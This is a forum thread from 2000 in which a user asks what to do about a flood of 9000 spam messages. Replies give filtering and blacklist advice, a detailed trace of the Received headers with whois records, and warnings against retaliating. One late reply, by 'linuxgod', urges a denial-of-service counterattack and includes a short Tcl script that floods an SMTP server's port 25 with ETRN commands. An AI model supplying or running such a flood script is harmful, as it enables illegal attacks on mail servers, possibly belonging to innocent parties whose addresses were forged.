When Does Spam Equal "Denial of Service"?

gary.flake asks: "I've long accepted that I am always going to receive more spam than real e-mail. However, in the past 48 hours I've recieved over 9000 (that's NINE THOUSAND) spam messages from the same spammer. I've sent complaints to every postmaster whose IP address appears in the header. I have also set up a filter to delete the remaining influx (but ~1,700 still got by in the early stages). What now? One would think that this behavior would be outright illegal. But it also appears that the sender and the advertised spam Web site are outside of U.S. jurisdiction. Any suggestions on how to proceed?" Aside from filtering the problem address in question, what can one do?

"Here is a sample header (with my email adress DELETED):

From - Sat Jul  1 10:11:08 2000
Return-Path:(DELETED)
Received: from h11.mail.home.com ([24.0.95.45]) by mail.rdc2.pa.home.com
(InterMail vM.4.01.03.00 201-229-121) with ESMTP id

          for (DELETED)
          Sat, 1 Jul 2000 06:46:51 -0700
Received: from mx11-rwc.mail.home.com (mx11-rwc.mail.home.com [24.0.95.29])
	by h11.mail.home.com (8.9.3/8.9.0) with ESMTP id GAA25694
	for (DELETED); Sat, 1 Jul 2000 06:46:51 -0700 (PDT)
Received: from mx04.netaddress.usa.net
(mx04.netaddress.usa.net [204.68.24.141])
	by mx11-rwc.mail.home.com (8.9.1/8.9.1) with SMTP id GAA20861
	for (DELETED); Sat, 1 Jul 2000 06:46:50 -0700 (PDT)
Received: (qmail 4654 invoked by uid 0); 1 Jul 2000 13:46:00 -0000
Received: from gsnonweb.com [194.90.101.35] by mx04 via mtad (34FM1.5.01)
	with ESMTP id 143egaNtx0454M04; Sat, 01 Jul 2000 13:45:58 GMT
Received: (apparently) from localhost ([216.8.12.174])
by gsnonweb.com  with Microsoft SMTPSVC(5.5.1877.197.19);
	 Sat, 1 Jul 2000 10:29:50 +0300
X-Mailer: Microsoft Outlook Express 5.00.2014.211
Date: Sat, 01 Jul 2000 00:30:14 -0800
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7BIT
From: auto65686@hushmail.com
Message-Id: 
Subject: You are invited to join our private club!
To: buddapest@LoadMail.com
X-Mozilla-Status: 8001
X-Mozilla-Status2: 00000000
X-UIDL: "

Try this...

[eap]

I assume you're probably familiar with Junkbusters [junkbusters.com]. If not, try their software. It will allow you to block most unwanted email.

Try joining the MAPS Realtime Blacklist [mail-abuse.org] of spammers.

Report the sites listed in the headers to ORBS [orbs.org]. If they have open mail relays, ORBS will log them in its database and send a notification to the postmaster. Mail relays which support ORBS will not relay mail coming from unsecured hosts. If the sites are clean, no harm done, ORBS will not flag them.

Finally, you can always work up a procmail script to filter out most spam. Sure, it doesn't keep spammers from using your network resources, but if everyone did it, spamming would be a lot less profitable.

Hope this helps

Only one question....

[GreyFauk]

Who did you piss off on-line in the last
5 days?
If it's more than 6 folks.. you might as well
start armoring your system from this kinda stuff.

Some people are screaming targets on the web.
You just got zapped.

File Suit

[GigsVT]

Save all evidence of the attack. Identify the spammer. Get a lawyer, extradite, and beat with a rubber hose until bright red. Then sue them. :) But seriously, the person may be located in the US, even if they are using overseas servers or accomplices. If you have the resources, you may be able to file suit.
-----------------------------

Re:File Suit

[tomblackwell]

I don't know about anything else, but the thought of doing anything involving a lawyer gives me the creeps. Even nailing a spammer.

Please don't just fire mail off to every domain!

[nazgul@somewhere.com]

All that does is cause a lot of work for a lot of people who had nothing to do with the spam.

Sites like http://www.spamcop.com/, or http://www.spamwatcher.com/ (which I'm in the process of setting up now--don't expect much) will help you track the sender, and who to report the problem to. You want to complain to the ISP where the spam originated. You want to complain to the hosting provider of any URLs mentioned. You want to send a warning note to the relay, telling them that their mailer is misconfigured. The rest of the addresses should be ignored.

These headers are nearly always forged:
To: buddapest@LoadMail.com
From: auto65686@hushmail.com
Message-ID:
The key is to look at the received headers. They track the
message as it goes from one machine to the next. Most, but not
all, mail servers record the IP address of the sending machine,
and there is no way to forge that. So the goal is to find the
first real machine to receive the email, and see where it got the
mail from. That machine will typically either be one of yours,
or it will be some (idiot) machine which left its mail software
open for others to use as a relay. In the latter case, it's worth
notify the that company, as well as the originating ISP.

Here are the Received headers in order:
Received: from h11.mail.home.com ([24.0.95.45]) by mail.rdc2.pa.home.com (InterMail vM.4.01.03.00 201-229-121) with ESMTP id for (DELETED) Sat, 1 Jul 2000 06:46:51 -0700
Received: from mx11-rwc.mail.home.com (mx11-rwc.mail.home.com [24.0.95.29]) by h11.mail.home.com (8.9.3/8.9.0) with ESMTP id GAA25694 for (DELETED); Sat, 1 Jul 2000 06:46:51 -0700 (PDT)
Received: from mx04.netaddress.usa.net (mx04.netaddress.usa.net [204.68.24.141]) by mx11-rwc.mail.home.com (8.9.1/8.9.1) with SMTP id GAA20861 for (DELETED); Sat, 1 Jul 2000 06:46:50 -0700 (PDT)
Received: (qmail 4654 invoked by uid 0); 1 Jul 2000 13:46:00 -0000
Couldn't parse (qmail 4654 invoked by uid 0); 1 Jul 2000 13:46:00 -0000.
Received: from gsnonweb.com [194.90.101.35] by mx04 via mtad (34FM1.5.01) with ESMTP id 143egaNtx0454M04; Sat, 01 Jul 2000 13:45:58 GMT
Received: (apparently) from localhost ([216.8.12.174]) by gsnonweb.com with Microsoft SMTPSVC(5.5.1877.197.19); Sat, 1 Jul 2000 10:29:50 +0300

If we ignore the forgeable names, that makes a chain, and for
element in the chain we can look it up and make sure that the
chain makes sense.

From: 216.8.12.174 (la-ip-1-174.dynamic.ziplink.net)
To: gsnonweb.com (194.90.1.6)
From: 194.90.101.35 (gsnews.gsnonweb.com)
To: mx04 via mtad (34FM1.5.01) (Unknown)
From: 204.68.24.141 (mx04.netaddress.usa.net)
To: mx11-rwc.mail.home.com (24.0.95.29)
From: 24.0.95.29 (mx11-rwc.mail.home.com)
To: h11.mail.home.com (24.0.95.45)
From: 24.0.95.45 (h11.mail.home.com)
To: mail.rdc2.pa.home.com (24.12.106.196)

So the spammer probably sent from 216.8.12.174 (la-ip-1-174.dynamic.ziplink.net).
And gsnonweb.com (194.90.1.6) is probably a system with an open relay.

Here is information on the ISP that owns the domains in question.

Spammer: 216.8.12.174 (la-ip-1-174.dynamic.ziplink.net)
Ziplink Inc. (NETBLK-NET-ZIPLINK2)
900 Chelmsford St., Tower 1, 5th Floor
Lowell, MA 01851
US

Netname: NET-ZIPLINK2
Netblock: 216.8.0.0 - 216.8.63.255
Maintainer: ZIPL

Coordinator:
Clampitt, Dustin (DC35-ARIN) dclampitt@ZIPLINK.NET
978 551 8602 (FAX) 978 970 0358

Domain System inverse mapping provided by:

PICNIC.ZIPLINK.NET 206.15.168.65
TITANIC.ZIPLINK.NET 206.15.168.70

Record last updated on 16-Nov-1999.
Database last updated on 14-Jul-2000 18:30:27 EDT.

The ARIN Registration Services Host contains ONLY Internet
Network Information: Networks, ASN's, and related POC's.
Please use the whois server at rs.internic.net for DOMAIN related
Information and whois.nic.mil for NIPRNET Information.

Relay: gsnonweb.com (194.90.1.6)
inetnum: 194.90.0.0 - 194.90.6.255
netname: NVNET1
descr: NetVision Ltd.
descr: ISP
descr: Local Networks
country: IL
admin-c: NN105-RIPE
tech-c: NN105-RIPE
status: ASSIGNED PA
mnt-by: NV-MNT-RIPE
mnt-lower: NV-MNT-RIPE
changed: noc-team@netvision.net.il 19990413
source: RIPE

route: 194.90.0.0/16
descr: Netvision
descr: Omega Bldg.
descr: MATAM industrial park
descr: Haifa 31905
descr: Israel
origin: AS1680
advisory: AS690 1:1239 2:3561 3:6453
mnt-by: NV-MNT-RIPE
changed: noc-team@netvision.net.il 19990902
source: RIPE

role: Netvision NOC team
address: Omega Building
address: MATAM industrial park
address: Haifa 31905
address: Israel
phone: +972 48 560 600
fax-no: +972 48 551 132
e-mail: noc-team@netvision.net.il
trouble: Send abuse and spam reports to abuse@netvision.net.il
admin-c: YG-RIPE
admin-c: YS-RIPE
admin-c: NNT-RIPE
tech-c: YG-RIPE
tech-c: YS-RIPE
tech-c: NNT-RIPE
tech-c: WAN-RIPE
nic-hdl: NN105-RIPE
notify: noc-team@netvision.net.il
notify: hm-dbm-msgs@ripe.net
mnt-by: NV-MNT-RIPE
changed: noc-team@netvision.net.il 19990505
changed: noc-team@netvision.net.il 20000315
changed: noc-team@netvision.net.il 20000525
changed: noc-team@netvision.net.il 20000531
source: RIPE

Couldn't you just....

[Thellan]

make a script to send every e-mail received from that e-mail address back to that address and load the spammer down with his own spam?

Rich

BAD idea

[rebill]

Company A spams you, but forges the headers and makes it look like Company C is spamming you.

You (failing to realize that Company A is the real culprit) retaliate against Company C.

Guess who is liable for the damages to Company C? (hint: you are)

Even more fun is if their system has an auto-responder. You bounce to them, they bounce to you, bounce to them, bounce to you, bounce to them and so on.

DOS them

[linuxgod]

DoS them Back. Try this. BTW, you think you will get in trouble for it? you won't. Take my word for it, i do this all the time from my machine. It runs on TCL. I made this a few months ago.
It took Anticlan.com's ftp server down. Ya, it
hits HARD. Hangs the mail server sending it.
Works on sendmail, and most others. This is for
anyone having trouble with spammers. Save this
in file and do 'tcl file', or 'tclsh file'.

--------------------CUT HERE------------------

set flood_count 2000
set curr_count 30

proc do_port { host port } {
puts stdout "Flooding $host:$port ..."
if {![catch {socket $host $port} sockfd]} {
puts stdout "CONNECTED.. "
puts stdout "SENDING SHIT.. "

puts $sockfd "ETRN x"

puts stdout "DONE!"
} else {
puts stdout "FAILED."
}
}

while {$curr_count < $flood_count} {
set curr_count [expr $curr_count + 1]
do_port server 25
}

----------------UNCUT HERE------------------